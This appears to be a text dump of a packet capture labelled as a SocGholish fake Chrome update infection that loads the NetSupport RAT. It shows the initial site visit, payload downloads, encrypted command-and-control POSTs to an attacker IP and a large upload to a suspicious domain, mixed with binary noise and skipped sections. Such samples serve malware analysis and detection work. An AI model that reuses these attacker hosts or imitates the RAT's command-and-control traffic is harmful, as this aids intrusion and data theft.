Text Example

Fake Google Chrome Update Malware: SocGholish Campaign Loads NetSupport RAT (PCAP File Download, Traffic Sample)

2019-08-26 15:03:01.209093 IP 10.8.26.101.51807 > 10.8.26.1.53: 44756+ A? mysocalledchaos.com. (37)
E..A.O……
..e
…._.5.-……………mysocalledchaos.com…..

2019-08-26 15:03:01.353045 IP 10.8.26.101.49163 > 166.62.111.64.80: Flags [P.], seq 1:409, ack 1, win 256, length 408: HTTP: GET / HTTP/1.1
E….d@…..
..e.>o@…P.9…C.&P…….GET / HTTP/1.1
Host: mysocalledchaos.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en

2019-08-26 15:03:39.075406 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 17917:19120, ack 14190, win 451, length 1203: HTTP
E…….1.[S….
..e.P.>..Y,n.?xP…0…

2019-08-26 15:03:39.075745 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 19120, win 256, length 0
E..(..@…[.
..e…..>.Pn.?x..].P………….
2019-08-26 15:03:39.168023 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 19120:20580, ack 14190, win 451, length 1460: HTTP
E…….1.ZQ….
..e.P.>..].n.?xP…….1000
2019-08-26 15:03:39.168037 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 20580:22040, ack 14190, win 451, length 1460: HTTP
E…….1.ZP….
..e.P.>..c.n.?xP…;…
2019-08-26 15:03:39.168042 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 22040:23224, ack 14190, win 451, length 1184: HTTP
E…….1.[c….
..e.P.>..iGn.?xP…X…

2019-08-26 15:03:39.168046 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 23224:24684, ack 14190, win 451, length 1460: HTTP
E…….1.ZN….
..e.P.>..m.n.?xP…’F..1000
…skipping…
Access-Control-Allow-Methods: GET,POST,OPTIONS,DELETE,PUT

2019-08-26 15:04:18.005975 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8959766, win 3626, length 0
E..(..@…M.
..e…..>.Pn.Bf.A.EP..* y……..
2019-08-26 15:04:18.016420 IP 93.95.100.178.80 > 10.8.26.101.49204: Flags [F.], seq 13215, ack 336, win 473, length 0
E..(V|..5.H.]_d.
..e.P.4vO….:.P….n..
2019-08-26 15:04:18.016640 IP 10.8.26.101.49204 > 93.95.100.178.80: Flags [.], ack 13216, win 256, length 0
E..(..@….W
..e]_d..4.P..:.vO..P….G……..
2019-08-26 15:04:18.037966 IP 93.95.100.178.80 > 10.8.26.101.49205: Flags [F.], seq 6011, ack 365, win 473, length 0
E..(…5.B.]_d.
..e.P.58._.DT.P....z..
2019-08-26 15:04:18.038169 IP 10.8.26.101.49205 > 93.95.100.178.80: Flags [.], ack 6012, win 256, length 0
E..(..@....V
..e]_d..5.P.DT.8.`P….S……..
2019-08-26 15:04:18.051835 IP 93.95.100.178.80 > 10.8.26.101.49206: Flags [F.], seq 343, ack 408, win 473, length 0
E..(….5..S]_d.
..e.P.6..0…..P…V…
2019-08-26 15:04:18.052044 IP 10.8.26.101.49206 > 93.95.100.178.80: Flags [.], ack 344, win 255, length 0
E..(..@….U
..e]_d..6.P……0.P…Wb……..
2019-08-26 15:04:18.568546 IP 93.95.100.178.80 > 10.8.26.101.49207: Flags [F.], seq 16499, ack 424, win 473, length 0
E..(.B..5…]_d.
..e.P.7q5jo.n..P….L..
2019-08-26 15:04:18.568555 IP 93.95.100.178.80 > 10.8.26.101.49209: Flags [F.], seq 16623, ack 424, win 473, length 0
E..(z…5.$.]_d.
..e.P.9…FV[..P…….
2019-08-26 15:04:18.568559 IP 93.95.100.178.80 > 10.8.26.101.49208: Flags [F.], seq 15919, ack 424, win 473, length 0
E..(….5…]_d.
..e.P.8(…I…P…u”..
2019-08-26 15:04:18.568563 IP 93.95.100.178.80 > 10.8.26.101.49210: Flags [F.], seq 16511, ack 424, win 473, length 0
E..(….5…]_d.
..e.P.:S.c…4.P…]…
2019-08-26 15:04:18.568814 IP 10.8.26.101.49207 > 93.95.100.178.80: Flags [.], ack 16500, win 256, length 0
E..(..@….T
..e]_d..7.P.n..q5jpP….%……..
2019-08-26 15:04:18.568842 IP 10.8.26.101.49209 > 93.95.100.178.80: Flags [.], ack 16624, win 256, length 0
E..(..@….S
..e]_d..9.PV[…..GP… ………
2019-08-26 15:04:18.568850 IP 10.8.26.101.49208 > 93.95.100.178.80: Flags [.], ack 15920, win 256, length 0
E..(..@….R
..e]_d..8.PI…(…P…u………
2019-08-26 15:04:18.568856 IP 10.8.26.101.49210 > 93.95.100.178.80: Flags [.], ack 16512, win 256, length 0
E..(..@….Q
..e]_d..:.P..4.S.c.P…]………
2019-08-26 15:04:19.288443 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [P.], seq 3947:3986, ack 89439, win 821, length 39
E..Oa-..T.d…]#
..e…0.m… D.P..5z…….”…
;.s+2..,…..+,……j….0..Y
2019-08-26 15:04:19.288452 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
E..(a…T.e…]#
..e…0.m… D.P..5r…
2019-08-26 15:04:19.288696 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [.], ack 3987, win 253, length 0
E..(..@…=2
..e..]#.0… D..m..P…t………
2019-08-26 15:04:19.288940 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [F.], seq 89439, ack 3987, win 253, length 0
E..(..@…=1
..e..]#.0… D..m..P…t………
2019-08-26 15:04:19.289444 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
E..(a/..T.e…]#
..e…0.m… D.P..5r…
2019-08-26 15:04:19.302333 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [.], ack 89440, win 821, length 0
E..(.k..T…..]#
…skipping…
2019-08-26 15:04:19.967401 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [P.], seq 1:119, ack 1, win 258, length 118: HTTP: GET /location/loca.asp HTTP/1.1
E…..@….
..e>..#.@.P.@..~b#.P…….GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:04:20.126241 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [P.], seq 215:521, ack 655, win 254, length 306
E(.ZrF..n.o=.+.Z
..e…?…….!P…l…HTTP/1.1 200 OK
Server: NetSupport Gateway/1.6 (Windows NT)
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=u.2h.r.. .…W.h.E..=I….=n~…….7s.4…}.X…),.,.Dq.,…..()4.]..%y-A9H=n .:!…b<D…c…)=@UX.u….8+.t_A…R..b..’h[.T…jI

2019-08-26 15:04:20.134779 IP 62.172.138.35.80 > 10.8.26.101.49216: Flags [P.], seq 1:276, ack 119, win 258, length 275: HTTP: HTTP/1.1 200 OK
E..;9…q.”S>..#
..e.P.@~b#..@..P….?..HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Set-Cookie: ASPSESSIONIDSQTTAQAS=JMCCAGKBFCGMCLKBAJJGPDLL; path=/
X-Powered-By: ASP.NET
Date: Mon, 26 Aug 2019 19:04:18 GMT
Content-Length: 1

,
2019-08-26 15:04:20.135084 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [.], ack 276, win 257, length 0
E..(..@….~
..e>..#.@.P.@..~b$.P…[d……..
2019-08-26 15:04:20.327276 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 655:927, ack 521, win 258, length 272
E..8..@…r.
..e.+.Z.?…..!…(P…….POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 179.43.146.90
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=l3.<(T{.E…..V….k.9|||$(m..$Cj_……..0Mt..s…M.6..

2019-08-26 15:04:20.570080 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [.], ack 927, win 253, length 0
E(.(rG..n.pn.+.Z
..e…?…(…1P…Td..
2019-08-26 15:04:20.627030 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N……..
..e
……..:…y………. FHFAEBEECACACACACACACACACACACAAA.. ..
2019-08-26 15:04:20.675976 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N……..
..e
……..:.
.{………. FHFAEBEECACACACACACACACACACACAAA.. ..
2019-08-26 15:04:20.727322 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 927:1217, ack 521, win 258, length 290
E..J..@…r.
..e.+.Z.?…..1…(P….b..POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Host: 179.43.146.90
…skipping…
Access-Control-Allow-Methods: GET,POST,OPTIONS,DELETE,PUT

2019-08-26 15:04:26.662060 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8960053, win 3624, length 0
E..(.B@…Ln
..e…..>.Pn.G..A.dP..(……….
2019-08-26 15:04:30.427725 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [P.], seq 409336:409766, ack 8960053, win 3624, length 430: HTTP: POST /1x1.gif?ss&ss2img HTTP/1.1
E….C@…J.
..e…..>.Pn.G..A.dP..(….POST /1x1.gif?ss&ss2img HTTP/1.1
Accept: */*
Accept-Language: en-us
Age: a17316821ea1038c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 979879f9.user3.altcoinfan.com
Content-Length: 385714
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:03:01.423467 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 468
2019-08-26 15:03:01.423995 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 1010
2019-08-26 15:03:01.472993 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
2019-08-26 15:03:01.473493 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28
2019-08-26 15:03:01.504670 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28
2019-08-26 15:03:01.528689 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 254
2019-08-26 15:03:01.573710 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
2019-08-26 15:03:01.576544 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 337
2019-08-26 15:03:01.625002 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
2019-08-26 15:03:01.802524 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 247
2019-08-26 15:03:01.849036 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
2019-08-26 15:03:03.418784 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.421675 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.421733 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.421795 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.422363 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.422395 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.424121 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.424206 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.424444 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.435279 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.435326 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.435397 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.435469 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.435540 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.448683 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 41
2019-08-26 15:03:03.448737 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.541893 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 296
2019-08-26 15:03:03.575606 IP 10.8.26.101.64439 > 172.217.9.142.443: UDP, length 1350
E..b..@…..
..e.. ……N…Q046P….2..x…. ……………CHLO….PAD…..SNI…..VER…..CCS…..UAID(…TCID,…PDMD0…SMHL4…ICSL8…NONPX…MIDS…SCLS...CSCT…COPTd…IRTTh…CFCWl…SFCWp…———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————www.google-analytics.comQ046…....~.......Chrome/76.0.3809.132 Windows NT 6.1; Win64; x64....X509........l..Y]..@T.]...W.....E.+...Zk^.o"d.......NSTP.w........…………………………………………………………………………………………………………………………………………………………………………………………………….